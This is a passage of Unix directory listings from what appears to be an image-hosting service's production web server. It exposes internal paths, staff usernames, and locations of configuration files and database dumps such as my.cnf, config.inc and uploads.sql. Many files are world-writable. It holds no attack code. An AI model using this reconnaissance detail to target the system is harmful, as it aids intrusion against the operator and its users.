-rw-r--r-- 1 root root 6.9K Dec 23 2010 multi_yfrog.php.orig
-rw-r--r-- 1 root root 1.3K Jun 9 2010 my.cnf
-rw-r--r-- 1 root root 5.9K Nov 30 2010 oldmultimod.php
-rwxrwxrwx 1 root root 0 Apr 22 2011 outof-fs.txt
-rwxrwxrwx 1 root root 0 Apr 22 2011 outof-lowhd.txt
-rwxrwxrwx 1 root root 0 Aug 22 22:59 outof-lvm.txt
-rw-r--r-- 1 root root 24 Aug 22 22:59 outofspace-critical.txt
drwxr-xr-x 2 root root 12K Aug 6 14:29 outputs
-rw-r--r-- 1 root root 0 Aug 22 22:59 overheat.txt
-rw-r--r-- 1 root root 7.8K Jul 22 2011 partners.php
-rwxrwxrwx 1 root root 0 Aug 22 22:59 pduamps.txt
-rw-r--r-- 1 root root 0 Aug 22 22:59 peanutalert.txt
drwxrwxrwx 2 root root 36K Jul 22 2010 pillspam
-rw-r--r-- 1 root root 55K Mar 20 2011 pillspam.txt
lrwxrwxrwx 1 image image 15 May 29 2010 public_html -> /home/image/ww
w
lrwxrwxrwx 1 image image 22 May 29 2010 python -> /home/image/svn/pyt
hon
-rw-r--r-- 1 root root 4.6K Jul 28 2010 regexURL.php
-rwxrwxrwx 1 root root 0 Apr 20 2011 region-servers.txt
-rwxr-xr-x 1 image image 63K Nov 10 2010 rejects
lrwxrwxrwx 1 root root 44 May 29 2010 report_load.sh -> /home/image
/svn/ops/tools/bin/report_load.sh
-rwxr-xr-x 1 root root 773 Dec 13 2010 reqtrack.php
lrwxrwxrwx 1 root root 45 May 29 2010 rob_filter.py -> /home/image/
svn/ops/tools/image/rob_filter.py
-rw-r--r-- 1 root root 13K May 25 2011 scrap_links.inc
-rwxrwxrwx 1 root root 0 Aug 22 22:59 serversdown.txt
lrwxrwxrwx 1 root root 47 Aug 6 14:29 smartfunction.php -> /home/im
age/svn/ops/tools/bin/smartfunction.php
-rw-r--r-- 1 macbeth users 1.1K May 29 2010 spam_daily.php
-rwxrwxrwx 1 root root 1 Nov 19 2010 streampile.txt
drwxr-xr-x 7 image image 4.0K Sep 14 2011 svn
-rwxrwxrwx 1 root root 1.1K Mar 20 2011 terry.php
-rw-r--r-- 1 root root 234 Jun 22 2010 test.php
-rwxrwxrwx 1 root root 200 Sep 15 2010 testtest.php
-rw-r--r-- 1 root root 420K Feb 21 2011 thrift.tgz
-rw-r--r-- 1 root root 35K Feb 21 2011 thrify.tgz
drwxr-xr-x 2 image image 4.0K Nov 17 2010 to_do
-rwxrwxrwx 1 root root 0 Aug 22 22:59 uploadchange.txt
-rwxr-xr-x 1 root root 978 Dec 20 2010 viewtrack.php
-rwxrwxrwx 1 root root 0 Aug 22 22:59 warnings.txt
-rwxr-xr-x 1 image image 4.8K Nov 10 2010 white
-rw-r--r-- 1 root root 82 Jul 26 2011 white.file
-rw-r--r-- 1 chrmaury users 123 Jul 29 2011 whitelist.file
drwxr-xr-x 78 image users 28K Jul 24 17:55 www
-rw-r--r-- 1 image root 55M Jun 24 2010 www.tgz
-rw-r--r-- 1 root root 1.6K May 17 2011 yfrog_mentioned.php
-rw-r--r-- 1 root root 0 Jan 6 2012 yfrogbadlinks.txt
-rwxrwxrwx 1 root root 0 Apr 2 2011 yfroguploadchange.txt
# ls -alt /home/image/www
total 178124056
-rwxrwxrwx 1 root root 32845983711 Aug 22 23:57 check_mod.txt
-rwxrwxrwx 1 root root 9034802388 Aug 22 23:57 check_mod_mobile.txt
-rwxrwxrwx 1 image image 139232043606 Aug 22 23:57 write_imports.file
-rwxrwxrwx 1 root root 35522664 Aug 22 23:57 popular.txt
-rw-r--r-- 1 root root 2100 Aug 22 23:57 379344.txt
-rw-r--r-- 1 root root 2100 Aug 22 23:57 422849.txt
-rw-r--r-- 1 root root 2100 Aug 22 23:57 279733.txt
-rw-r--r-- 1 root root 2100 Aug 22 23:57 426263.txt
-rwxrwxrwx 1 root root 0 Aug 22 23:57 peanutalert.txt
-rwxrwxrwx 1 root root 0 Aug 22 23:55 warnings.txt
-rwxrwxrwx 1 root root 2 Aug 22 23:55 capacity.txt
-rwxrwxrwx 1 root root 0 Aug 22 23:55 outof-lvm.txt
-rw-r--r-- 1 root root 25 Aug 22 23:55 outofspace-critical.t
xt
-rwxrwxrwx 1 root root 0 Aug 22 23:55 overheat.txt
-rwxrwxrwx 1 root root 3 Aug 22 23:55 serversdown.txt
-rwxrwxrwx 1 root root 354 Aug 22 23:54 routing.txt
-rwxrwxrwx 1 image image 0 Aug 22 23:50 uploadchange.txt
-rwxr-xr-x 1 root root 0 Aug 22 23:46 convo.old
-rwxrwxrwx 1 root root 0 Aug 22 23:46 convo.txt
-rw-r--r-- 1 image image 55919 Aug 22 23:01 pillspam.backup
drwxrwxrwx 2 root root 4096 Aug 22 19:38 actionitems
-rw-r--r-- 1 root root 1259520 Aug 22 09:00 csv_backups.tar
-rw-r--r-- 1 root root 5 Aug 22 08:00 reqheader.csv
-rw-r--r-- 1 root root 23343 Aug 22 08:00 reqreport.csv
-rw-r--r-- 1 root root 22350 Aug 22 04:02 500report.csv
-rw-r--r-- 1 image image 26 Aug 22 04:02 504header.csv
-rw-r--r-- 1 image image 13858 Aug 22 04:02 504report.csv
-rw-r--r-- 1 root root 12697 Aug 22 04:02 compreport.csv
-rw-r--r-- 1 root root 5 Aug 22 04:02 header.csv
-rw-r--r-- 1 root root 59052 Aug 22 04:02 report.csv
-rw-r--r-- 1 root root 182 Aug 22 04:02 subs-header.csv
-rw-r--r-- 1 root root 34541 Aug 22 04:02 subs-subs.csv
-rw-r--r-- 1 root root 60 Aug 22 04:02 500header.csv
-rw-r--r-- 1 root root 26191 Aug 22 04:01 POWERPAGE.backup.htm
-rwxrwxrwx 1 root root 133031 Aug 22 02:59 accountregistrationre
port.csv
-rwxrwxrwx 1 root root 146642 Aug 22 01:59 accountdeletionreport
.csv
drwxrwxrwx 2 root root 4096 Aug 14 11:43 wires
drwxrwxrwx 3 image image 12288 Aug 14 11:31 en
drwxr-xr-x 20 image image 12288 Aug 6 14:29 ..
drwxr-xr-x 78 image users 28672 Jul 24 17:55 .
-rw-r--r-- 1 root root 11304 Jul 24 17:55 modpanel.php
-rw-r--r-- 1 root root 185 Jul 24 14:34 yfrog3_subscribe.php
-rw-r--r-- 1 image image 251 Jul 24 14:32 unsubscribe.php
-rw-r--r-- 1 root root 7487 Jun 28 23:13 csvtohtml.php
-rw-r--r-- 1 root root 4112 Jun 28 23:07 yfrog_v2-sla.php
-rw-r--r-- 1 root root 3497 Jun 28 22:43 users.php
-rw-r--r-- 1 root root 3053 Jun 25 14:59 write_imports.php
-rw-r--r-- 1 root root 3497 Jun 25 09:37 users_v2.php
-rw-r--r-- 1 root root 3798 May 22 14:55 write_imports_back
-rw-r--r-- 1 root root 3384 May 21 22:03 write_import2.php
-rw-r--r-- 1 root root 11839 May 21 17:34 modpanel_v2.php
-rwxr-xr-x 1 root root 1492 May 18 17:02 chmod_me.php
-rw-r--r-- 1 root root 12039 May 17 19:17 modpanel_v3.php
-rw-r--r-- 1 root root 4163 May 17 17:43 write_imports_dev.php
-rw-r--r-- 1 root root 4945 Apr 23 13:11 check_mod.php
drwxr-xr-x 2 root root 4096 Apr 4 13:01 api
drwxr-xr-x 2 image image 4096 Apr 4 12:18 db_api
-rw-r--r-- 1 root root 3313 Mar 27 16:01 insert_to_queue.php
-rwxr-xr-x 2 image image 23363 Mar 21 17:38 upload_api.php
-rwxr-xr-x 2 image image 12087 Mar 21 17:38 backend.inc
-rwxr-xr-x 2 image image 6803 Feb 8 2012 contact.php
drw-r-xr-x 2 image image 4096 Jan 23 2012 wire
-rwxrwxrwx 1 root root 1873 Jan 6 2012 convo.php
-rw-r--r-- 1 root root 11672 Jan 5 2012 modpanel2.php
-rw-r--r-- 1 root root 4929 Jan 5 2012 check_mod.php.orig
-rw-r--r-- 1 root root 4995 Jan 4 2012 c_mod.php
-rw-r--r-- 1 root root 59 Dec 22 2011 accountdeletionheader
.csv
-rwxrwxrwx 1 root root 11 Dec 22 2011 accountdeletiontemp.c
sv
-rwxr-xr-x 1 root root 27 Dec 22 2011 accountregistrationhe
ader.csv
-rwxr-xr-x 1 root root 23 Dec 22 2011 accountregistrationsh
eader.csv
-rwxrwxrwx 1 root root 23 Dec 21 2011 accountrestorationhea
der.csv
-rwxr-xr-x 1 root root 1492 Dec 16 2011 chmod_me2.php
-rw-r--r-- 1 root root 11142 Dec 14 2011 modpanel1.php
-rw-r--r-- 1 root root 44 Dec 14 2011 test2.php
-rw------- 1 root root 52 Nov 26 2011 nohup.out
-rwxrwxrwx 1 root root 0 Nov 15 2011 deletefail.txt
drwxrwxrwx 3 image image 20480 Nov 3 2011 chmod_dir
-rw-r--r-- 1 root root 244948070 Oct 12 2011 out.out2
-rw-r--r-- 1 root root 130861724 Oct 12 2011 out.out
-rw-r--r-- 1 root root 1045 Oct 12 2011 uploads.php
-rw-r--r-- 1 root root 5 Sep 28 2011 compheader.csv
-rw-r--r-- 1 root root 447 Sep 8 2011 pcrheader.csv
-rw-r--r-- 1 root root 50864 Sep 8 2011 pcrreport.csv
-rw-r--r-- 1 root root 447 Sep 8 2011 pcruheader.csv
-rw-r--r-- 1 root root 45811 Sep 8 2011 pcrureport.csv
-rw-r--r-- 1 image image 3089 Aug 30 2011 auths.php
-rw-r--r-- 1 root root 1157 Jul 29 2011 mod_report.php
-rwxr-xr-x 1 root root 1207 Jul 27 2011 chmod_me_dev.php
-rw-r--r-- 1 root root 278630 Jul 26 2011 test2.htm
-rw-r--r-- 1 root root 80289 Jul 26 2011 test.htm
-rw-r--r-- 1 root root 19 Jul 26 2011 php.php
-rw-r--r-- 1 root root 490 Jul 26 2011 separ.php
-rwxr-xr-x 1 root root 917 Jul 23 2011 chmod_me3.php
-rwxr-xr-x 1 root root 1908 Jul 22 2011 chmod_me_bac
drwxr-xr-x 2 image image 4096 Jun 29 2011 flashupload
-rw-r--r-- 1 root root 1545 Jun 28 2011 sch.csv
-rw-r--r-- 1 root root 326 Jun 27 2011 pop.php
-rw-r--r-- 1 root root 324 Jun 27 2011 unpop.php
-rw-r--r-- 1 root root 287 Jun 27 2011 popcheck.php
-rw-r--r-- 1 root root 180 Jun 27 2011 test_email.php
-rw-r--r-- 1 root root 89 Jun 27 2011 popular.php
-rw-r--r-- 1 root root 445788 Jun 26 2011 bla
-rw-r--r-- 1 root root 852 Jun 26 2011 check.php
-rw-r--r-- 1 root root 49 Jun 25 2011 test.php
-rw-r--r-- 1 macbeth users 165497 Jun 24 2011 ardjjwm.png
-rw-r--r-- 1 root root 4606064 Jun 23 2011 all.txt
-rw-r--r-- 1 root root 108 Jun 15 2011 button.htm
-rw-r--r-- 1 root root 228 Jun 9 2011 list2.txt
-rw-r--r-- 1 root root 228 Jun 9 2011 file2.txt
-rw-r--r-- 1 root root 13577 Jun 9 2011 list.txt
-rw-r--r-- 1 root root 13718 Jun 9 2011 list.all
-rw-r--r-- 1 root root 14569 Jun 9 2011 list.u
-rw-r--r-- 1 root root 20024 Jun 9 2011 list.r
-rw-r--r-- 1 root root 5830 Jun 9 2011 list4
-rw-r--r-- 1 root root 5971 Jun 9 2011 list3
-rw-r--r-- 1 root root 6281 Jun 9 2011 list2
-rw-r--r-- 1 root root 6422 Jun 9 2011 list1
-rw-r--r-- 1 root root 7860 Jun 9 2011 list
-rw-r--r-- 1 root root 59 Jun 8 2011 index.php
-rw-r--r-- 1 root root 6827 Jun 8 2011 benj.jpg
-rw-r--r-- 1 root root 6165 Jun 3 2011 flickrheader.csv
-rw-r--r-- 1 root root 82558 Jun 3 2011 flickrreport.csv
-rw-r--r-- 1 root root 6165 Jun 3 2011 plixiheader.csv
-rw-r--r-- 1 root root 88957 Jun 3 2011 plixireport.csv
-rw-r--r-- 1 root root 6165 Jun 3 2011 tweetphotoheader.csv
-rw-r--r-- 1 root root 79715 Jun 3 2011 tweetphotoreport.csv
-rw-r--r-- 1 root root 6165 Jun 3 2011 twitpicheader.csv
-rw-r--r-- 1 root root 93206 Jun 3 2011 twitpicreport.csv
-rwxrwxrwx 1 image image 0 May 18 2011 recent_ad_hits.txt
-rw-r--r-- 1 root root 6497 May 9 2011 admob.php
-rw-r--r-- 1 root root 888 May 9 2011 blamo
-rw------- 1 root root 0 May 8 2011 adium.htm.save
-rw------- 1 root root 1 May 8 2011 adium.htm.save.1
-rw-r--r-- 1 image image 3759 May 7 2011 cc
drwxr-xr-x 2 root root 4096 May 5 2011 xmlapi
-rwxr-xr-x 2 image image 6100 May 5 2011 content.php
drwxr-xr-x 2 root root 4096 May 4 2011 bonus
-rw-r--r-- 1 root root 1462 May 3 2011 results.txt
-rwxr-xr-x 1 root root 1254 Apr 26 2011 text.txt
-rw-r--r-- 1 root root 10503 Apr 26 2011 test.txt
-rw-r--r-- 1 root root 846 Apr 26 2011 hacker.htm
-rw-r--r-- 1 root root 1168 Apr 25 2011 script.js
-rw-r--r-- 1 root root 2627 Apr 25 2011 yf.txt
-rw-r--r-- 1 root root 66 Apr 25 2011 style.css
-rwxrwxrwx 1 root root 0 Apr 22 2011 outof-fs.txt
-rwxrwxrwx 1 root root 0 Apr 22 2011 outof-lowhd.txt
-rw-r--r-- 1 root root 1330 Apr 22 2011 chart.htm
drwxr-xr-x 2 image image 4096 Apr 21 2011 illegal_content
-rwxrwxrwx 1 root root 0 Apr 20 2011 region-servers.txt
-rwxrwxrwx 1 root root 0 Apr 20 2011 hbase1-region-servers
.txt
-rwxrwxrwx 1 root root 4 Apr 15 2011 dnsnotbalancing.txt
drwxr-xr-x 2 root root 94208 Apr 14 2011 sitemap
-rw-r--r-- 1 root root 39 Apr 10 2011 pets
-rw-r--r-- 1 root root 38739 Apr 8 2011 test.png
-rwxrwxrwx 1 root root 182 Apr 2 2011 alert_writer.php
-rw-r--r-- 1 root root 85925 Mar 31 2011 jquery.js
-rw-r--r-- 1 root root 1477 Mar 30 2011 intent.php
-rw-r--r-- 1 npettas users 9138572 Mar 28 2011 blacklist
-rwxrwxrwx 1 root root 1 Mar 25 2011 pduamps.txt
-rw-r--r-- 1 root root 1813 Mar 22 2011 1001.csv
-rw-r--r-- 1 root root 2108 Mar 22 2011 inventory.csv
-rwxr-xr-x 1 image image 5228 Mar 21 2011 grand.php
-rw-r--r-- 1 image image 1359 Mar 10 2011 hbase_function.php
drwxr-xr-x 3 image image 4096 Mar 9 2011 setup
-rw-r--r-- 1 root root 11206 Mar 3 2011 yfrog-content.php
-rw-r--r-- 1 root root 76 Mar 1 2011 routing_collector.php
-rwxrwxrwx 1 root root 0 Mar 1 2011 onsite.txt
-rw-r--r-- 1 root root 148013 Mar 1 2011 image_sitemap.xml
-rw-r--r-- 1 root root 406 Feb 28 2011 make_qr.php
drwxr-xr-x 2 root root 4096 Feb 28 2011 qr
drwxr-xr-x 3 image image 4096 Feb 28 2011 tablecloth
-rwxr-xr-x 2 image image 11932 Feb 27 2011 register_image.php
-rwxrwxr-x 1 image image 6049 Feb 27 2011 domain.class.php
-rw-r--r-- 1 root root 95 Feb 23 2011 tor
drwxrwxrwx 2 root root 4096 Feb 23 2011 tor2
drwxr-xr-x 2 root root 4096 Feb 22 2011 advertiser
-rw-r--r-- 1 root root 195 Feb 15 2011 t_rift_h.php
-rw-r--r-- 1 root root 610 Feb 15 2011 test_speed.php
-rw-r--r-- 1 root root 18303 Feb 15 2011 test_speed.file
drwxr-xr-x 2 root root 4096 Feb 11 2011 supportpanel
-rwxr-xr-x 2 image image 8996 Feb 10 2011 jemail.php
-rw-r--r-- 1 root root 19041 Feb 7 2011 blacklist.inc
-rw-r--r-- 1 image image 528 Feb 3 2011 chmod_pull.php
drwxrwxrwx 2 root root 4096 Jan 31 2011 dsh
-rw-r--r-- 1 root root 143 Jan 27 2011 get_list.sh
-rw-r--r-- 1 root root 2523 Jan 27 2011 leaderboards.htm
lrwxrwxrwx 1 root root 15 Jan 27 2011 symlink_report -> /di
sk2/reports/
-rw-r--r-- 1 root root 59 Jan 26 2011 leaderboards.php
-rw-r--r-- 1 root root 2996 Jan 19 2011 angleshoot.htm
-rw-r--r-- 1 root root 58 Jan 19 2011 angleshoot.php
-rw-r--r-- 1 root root 55 Jan 19 2011 showhand.php
-rw-r--r-- 1 root root 3359 Jan 17 2011 showhand.htm
-rw-r--r-- 1 image image 3185 Jan 10 2011 banpanel.php
-rw-r--r-- 1 root root 238 Jan 7 2011 unserial.php
-rw-r--r-- 1 root root 450 Jan 5 2011 blam2.htm
-rw-r--r-- 1 root root 424 Jan 5 2011 blam.htm
-rwxr-xr-x 2 image image 20483 Jan 5 2011 functions.php
-rw-r--r-- 1 macbeth users 11115615 Dec 29 2010 imageshackdatacenter.
mov
-rw-r--r-- 1 root root 1511 Dec 23 2010 write_imports.php.bak
-rw-r--r-- 1 root root 1732 Dec 23 2010 write_imports2.php
-rw-r--r-- 1 root root 8165 Dec 21 2010 mu
-rwxr-xr-x 1 root root 4910 Dec 16 2010 grand2.php
-rw-r--r-- 1 image image 318 Dec 14 2010 cc2
-rw-r--r-- 1 root root 175 Dec 10 2010 upsreport.csv
-rw-r--r-- 1 root root 24 Dec 10 2010 blabla
-rw-r--r-- 1 root root 22 Dec 10 2010 upsheader.csv
-rwxrwxrwx 1 root root 91 Dec 10 2010 count.sh
-rw-r--r-- 1 root root 447 Dec 10 2010 viewheader.csv
-rw-r--r-- 1 root root 2283 Dec 10 2010 viewreport.csv
-rw-r--r-- 1 image image 1970 Dec 10 2010 servheader.csv
-rw-r--r-- 1 image image 191694 Dec 10 2010 servreport.csv
-rw-r--r-- 1 image image 149 Dec 10 2010 uploadheader.csv
-rw-r--r-- 1 image image 27344 Dec 10 2010 uploadreport.csv
-rw-r--r-- 1 image image 323 Dec 10 2010 ccgeoheader.csv
-rw-r--r-- 1 image image 1039 Dec 10 2010 geoheader.csv
-rw-r--r-- 1 image image 96392 Dec 10 2010 georeport.csv
-rw-r--r-- 1 image image 816 Dec 10 2010 apiheader.csv
-rw-r--r-- 1 image image 48984 Dec 10 2010 apireport.csv
-rw-r--r-- 1 image image 3749 Dec 10 2010 partners.file
-rwxrwxrwx 1 root root 34476 Dec 8 2010 yfrogtrack.file
-rwxrwxrwx 1 root root 87 Dec 7 2010 add.sh
-rw-r--r-- 1 image image 17207 Dec 7 2010 slareport.csv
-rw-r--r-- 1 image image 215 Dec 7 2010 slaheader.csv
-rw-r--r-- 1 root root 37898 Dec 3 2010 bla.htm
-rwxrwxrwx 1 image image 973 Dec 2 2010 exceptions.txt
-rwxrwxrwx 1 image image 112 Dec 2 2010 upload.count
-rwxrwxrwx 1 root root 1 Dec 2 2010 badlinks.txt
-rw-r--r-- 1 root root 158 Dec 2 2010 brokenlinks.htm
-rwxrwxrwx 1 image image 0 Dec 2 2010 snapshot.txt
-rwxrwxrwx 1 root root 0 Dec 2 2010 yfroguploadchange.txt
-rw-r--r-- 1 image image 0 Dec 2 2010 file_counts_to_gslb
drwxr-xr-x 2 root root 4096 Dec 2 2010 hourly_reports
-rw-r--r-- 1 image image 1863084 Nov 30 2010 processlist.log
-rw-r--r-- 1 root root 367 Nov 24 2010 deletefailed.php
-rw-r--r-- 1 root root 183 Nov 23 2010 sup.php
drwxrwxrwx 2 image image 12288 Nov 22 2010 porn
-rw-r--r-- 1 root root 409600 Nov 17 2010 csv_backups
-rwxrwxrwx 1 root root 1 Nov 16 2010 hbase.log
-rw-r--r-- 1 root root 5683200 Nov 16 2010 imageshack_blog.tar
-rw-r--r-- 1 root root 911360 Nov 16 2010 wordpress.tar
drwxr-xr-x 2 root root 20480 Nov 12 2010 final
-rw-r--r-- 1 root root 732 Nov 12 2010 test.import
-rwxrwxrwx 1 root root 0 Nov 11 2010 hitachi.import.txt
-rw-r--r-- 1 root root 13751 Nov 10 2010 slareport.bak
-rwxrwxrwx 1 root root 208 Nov 10 2010 rerun_sla.sh
-rw-r--r-- 1 root root 177 Nov 3 2010 vpn_onsite_collector.
php
-rw-r--r-- 1 root root 21 Nov 2 2010 test_rest1.php
-rw-r--r-- 1 root root 126 Nov 2 2010 test_rest.php
-rwxr-xr-x 1 root root 836 Oct 27 2010 chmod_me.php_bak
-rw-r--r-- 1 root root 136 Oct 21 2010 insert_into_hbase.php
-rw-r--r-- 1 image image 3033 Oct 20 2010 shared_functions.php
-rw-r--r-- 1 root root 9910 Oct 18 2010 recaptchalib.php
drwxr-xr-x 2 image image 4096 Oct 18 2010 reviewer
drwxr-xr-x 2 root root 4096 Oct 9 2010 newegg
-rw-r--r-- 1 root root 0 Oct 9 2010 test.file
-rw-r--r-- 1 root root 3816 Oct 1 2010 missed.htm
-rwxrwxrwx 1 root root 1860 Oct 1 2010 missed.txt
-rwxrwxrwx 1 root root 675 Sep 26 2010 bot.php
-rw-r--r-- 1 root root 52555776 Sep 24 2010 uploads.sql
-rwxr-xr-x 1 image image 146 Sep 23 2010 redirect.php
-rwxr-xr-x 1 image image 146 Sep 23 2010 500.php
drwxr-xr-x 3 root root 4096 Sep 22 2010 php
-rw-r--r-- 1 root root 849 Sep 22 2010 testmail.php
-rwxr-xr-x 2 image image 13782 Sep 21 2010 config.inc
-rw-r--r-- 1 root root 810 Sep 21 2010 testmail2.php
-rwxrwxrwx 1 root root 122 Sep 21 2010 PEAR.sh
-rw-r--r-- 1 root root 380 Sep 20 2010 signature.htm
-rw-r--r-- 1 root root 6200 Sep 20 2010 imageshacklogowhite.p
ng
-rw-r--r-- 1 root root 124 Sep 16 2010 alert.php
-rw-r--r-- 1 root root 325 Sep 16 2010 watch.php
-rw-r--r-- 1 root root 1083 Sep 10 2010 athlon.3.2.count
-rw-r--r-- 1 root root 153680 Sep 10 2010 reg.uploads.091010.ha
shed.format.5000.dkeys.checked
-rw-r--r-- 1 root root 133680 Sep 10 2010 reg.uploads.091010.ha
shed.format.5000.dkeys
-rw-r--r-- 1 root root 134255 Sep 10 2010 reg.uploads.091010.ha
shed.format.5000
-rw-r--r-- 1 root root 11415138 Sep 10 2010 reg.uploads.091010.ha
shed
-rw-r--r-- 1 root root 23287826 Sep 10 2010 reg.uploads.091010
-rw-r--r-- 1 root root 128818 Sep 10 2010 yfrog.uploads.091010.
dkeys.format.5000.dkeys.checked
-rw-r--r-- 1 root root 108820 Sep 10 2010 yfrog.uploads.091010.
dkeys.format.5000.dkeys
-rw-r--r-- 1 root root 6587108 Sep 10 2010 yfrog.uploads.091010
-rw-r--r-- 1 root root 109416 Sep 10 2010 yfrog.uploads.091010.
dkeys.format.5000
-rw-r--r-- 1 root root 2774077 Sep 10 2010 yfrog.uploads.091010.
dkeys
-rw-r--r-- 1 root root 14617 Sep 9 2010 POWERPAGE.htm
-rw-r--r-- 1 root root 12430022 Sep 9 2010 simkid.bad.format.sho
rt
-rw-r--r-- 1 root root 12473473 Sep 9 2010 simkid.bad.format
-rw-r--r-- 1 root root 51458186 Sep 9 2010 simkid.bad
-rw-r--r-- 1 image image 22 Sep 9 2010 banned_ips.file
-rwxrwxrwx 1 root root 402 Sep 2 2010 curlcheck.php
-rw-r--r-- 1 root root 401 Sep 2 2010 makelink.php
-rw-r--r-- 1 root root 280 Sep 1 2010 test_reviewed.php
-rw-r--r-- 1 root root 200966 Sep 1 2010 imageshack.wdgt.zip
-rw-r--r-- 1 root root 190 Aug 31 2010 reviewed.php
drwxr-xr-x 4 image image 4096 Aug 24 2010 css
drwxr-xr-x 2 image image 4096 Aug 24 2010 health
drwxr-xr-x 4 image image 4096 Aug 24 2010 homepage
drwxr-xr-x 6 image image 12288 Aug 24 2010 images
drwxr-xr-x 2 image image 4096 Aug 24 2010 mobilevideo
drwxr-xr-x 3 image image 4096 Aug 24 2010 registration
drwxr-xr-x 3 image image 4096 Aug 24 2010 slideshow
drwxr-xr-x 2 image image 4096 Aug 24 2010 swfupload
drwxr-xr-x 10 image image 4096 Aug 24 2010 yfrog
drwxr-xr-x 5 image image 4096 Aug 24 2010 shareable
drwxr-xr-x 2 image image 4096 Aug 24 2010 toolbar
drwxr-xr-x 2 image image 4096 Aug 24 2010 tpl
drwxr-xr-x 2 image image 4096 Aug 24 2010 video
-rw-r--r-- 1 root root 90 Aug 22 2010 dice.php
drwxr-xr-x 3 root root 4096 Aug 18 2010 streams
-rwxr-xr-x 2 image image 10822 Aug 17 2010 content_round.php
drwxr-xr-x 3 root root 4096 Aug 11 2010 test2
-rw-r--r-- 1 root root 2939 Aug 11 2010 search_list.php
-rw-r--r-- 1 root root 5711 Aug 11 2010 100
-rwxr-xr-x 1 root root 299 Aug 11 2010 remove_torrent.php
-rwxr-xr-x 2 image image 169 Aug 10 2010 search.php
-rwxr-xr-x 2 image image 6152 Aug 10 2010 dynamic-ad1.php
-rwxr-xr-x 2 image image 4337 Aug 10 2010 pornrx.inc
drwxr-xr-x 2 image image 4096 Aug 6 2010 dev
-rwxr-xr-x 2 image image 1057 Aug 5 2010 allinc.php
-rwxr-xr-x 2 image image 31482 Aug 5 2010 gal.php
-rwxr-xr-x 2 image image 8467 Aug 5 2010 transload.php
-rwxr-xr-x 2 image image 559 Aug 3 2010 newuploader_ad.php
-rwxr-xr-x 2 image image 1954 Aug 2 2010 logout.php
-rwxr-xr-x 2 image image 46160 Jul 29 2010 scripts.js
-rwxr-xr-x 1 root root 7929 Jul 29 2010 contact_old.php
-rwxr-xr-x 1 root root 6653 Jul 29 2010 contact_new.php
-rwxr-xr-x 2 image image 6831 Jul 29 2010 codegen.js
-rwxr-xr-x 2 image image 3142 Jul 29 2010 codegen.php
-rwxr-xr-x 2 image image 10196 Jul 29 2010 fullimg.php
-rwxr-xr-x 2 image image 2517 Jul 29 2010 imagecomments.php
-rwxr-xr-x 2 image image 12830 Jul 29 2010 my.php
-rwxr-xr-x 2 image image 7480 Jul 29 2010 save_images.php
-rwxr-xr-x 2 image image 4059 Jul 29 2010 videoupload.php
-rwxr-xr-x 2 image image 996 Jul 27 2010 check_subscribe.php
-rwxr-xr-x 2 image image 1270 Jul 27 2010 getrelatedimages.php
-rwxr-xr-x 2 image image 12182 Jul 27 2010 imagecomments.inc
-rwxr-xr-x 2 image image 944 Jul 22 2010 403.php
-rwxr-xr-x 2 image image 9377 Jul 22 2010 links.php
-rwxr-xr-x 2 image image 3015 Jul 20 2010 stillshot.php
drwxr-xr-x 2 image image 12288 Jul 16 2010 504s
-rwxr-xr-x 2 image image 1198 Jul 15 2010 crossdomain.xml
-rw-r--r-- 1 root root 101 Jul 8 2010 sum
-rwxr-xr-x 2 image image 1108 Jul 8 2010 get_image_stats.php
-rw-r--r-- 1 root root 2498204 Jul 7 2010 chmod_again_now
-rw-r--r-- 1 root root 956 Jul 7 2010 sa
-rwxr-xr-x 2 image image 30507 Jul 1 2010 v_images.php
drwxr-xr-x 3 image image 4096 Jul 1 2010 friends
drwxr-xr-x 3 image image 4096 Jul 1 2010 import
drwxr-xr-x 2 image image 4096 Jul 1 2010 my_gallery
drwxr-xr-x 5 image image 4096 Jul 1 2010 prefs
-rwxr-xr-x 2 image image 10649 Jul 1 2010 edit.php
-rw------- 1 root root 8874 Jul 1 2010 sda.save
-rw-r--r-- 1 root root 8868 Jul 1 2010 sda
drwxrwxrwx 2 root root 4096 Jun 28 2010 stuff
-rwxrwxrwx 1 macbeth users 477379963 Jun 27 2010 thedarktower.bla
-rw-r--r-- 1 root root 224 Jun 26 2010 blansa
drwxr-xr-x 2 image image 4096 Jun 24 2010 hire
drwxr-xr-x 3 image image 4096 Jun 24 2010 img
drwxr-xr-x 2 image image 4096 Jun 24 2010 style
drwxr-xr-x 5 image image 4096 Jun 24 2010 blog
drwxr-xr-x 3 image image 4096 Jun 23 2010 pillspam
-rwxr-xr-x 2 image image 40137 Jun 22 2010 scam.png
-rw-r--r-- 1 image image 134 Jun 22 2010 pillspam.php
-rwxr-xr-x 2 image image 19054 Jun 22 2010 javascript.php
-rw-r--r-- 1 image image 5087 Jun 22 2010 bak
-rw-r--r-- 1 image image 7280 Jun 21 2010 blas
drwxrwxrwx 2 image image 4096 Jun 18 2010 form
drwxr-xr-x 2 image image 4096 Jun 18 2010 count
-rw-r--r-- 1 image image 24005 Jun 18 2010 form.zip
-rw-r--r-- 1 image image 309 Jun 18 2010 date.php
-rwxr-xr-x 2 image image 1220 Jun 17 2010 aff.inc
-rw-r--r-- 1 image image 487 Jun 17 2010 redirector.php
-rw-r--r-- 1 image image 16763 Jun 15 2010 press-releases-and-me
dia-coverage.php.1
-rw-r--r-- 1 image image 0 Jun 15 2010 press-releases-and-me
dia-coverage.php
-rwxr-xr-x 2 image image 29181 Jun 15 2010 gallery_api.inc
-rw-r--r-- 1 image image 130255 Jun 9 2010 ids
-rw-r--r-- 1 image image 75189 Jun 8 2010 sizefile
-rw-r--r-- 1 image image 2818 Jun 8 2010 blans
-rw-r--r-- 1 image image 2996 Jun 8 2010 blan
-rw-r--r-- 1 image image 39 Jun 7 2010 long2ip.php
-rw-r--r-- 1 image image 723 Jun 5 2010 504_loader.gif
-rw-r--r-- 1 image image 723 Jun 5 2010 ajaxloaderm.gif
-rw-r--r-- 1 image image 0 Jun 5 2010 download.php?img=cach
e%2FFF%2FFF%2FFF%2FFA%2FD9%2F24%2F38-1.gif.1
-rw-r--r-- 1 image image 0 Jun 5 2010 download.php?img=cach
e%2FFF%2FFF%2FFF%2FFA%2FD9%2F24%2F38-1.gif
-rwxr-xr-x 2 image image 44450 Jun 4 2010 actions.js
-rw-r--r-- 1 image image 119 Jun 4 2010 cc4
-rw-r--r-- 1 image image 229 Jun 4 2010 cc3
-rw-r--r-- 1 image image 246 Jun 4 2010 black
-rwxr-xr-x 2 image image 9507 Jun 3 2010 comments.inc
-rwxr-xr-x 2 image image 12370 Jun 3 2010 comments.php
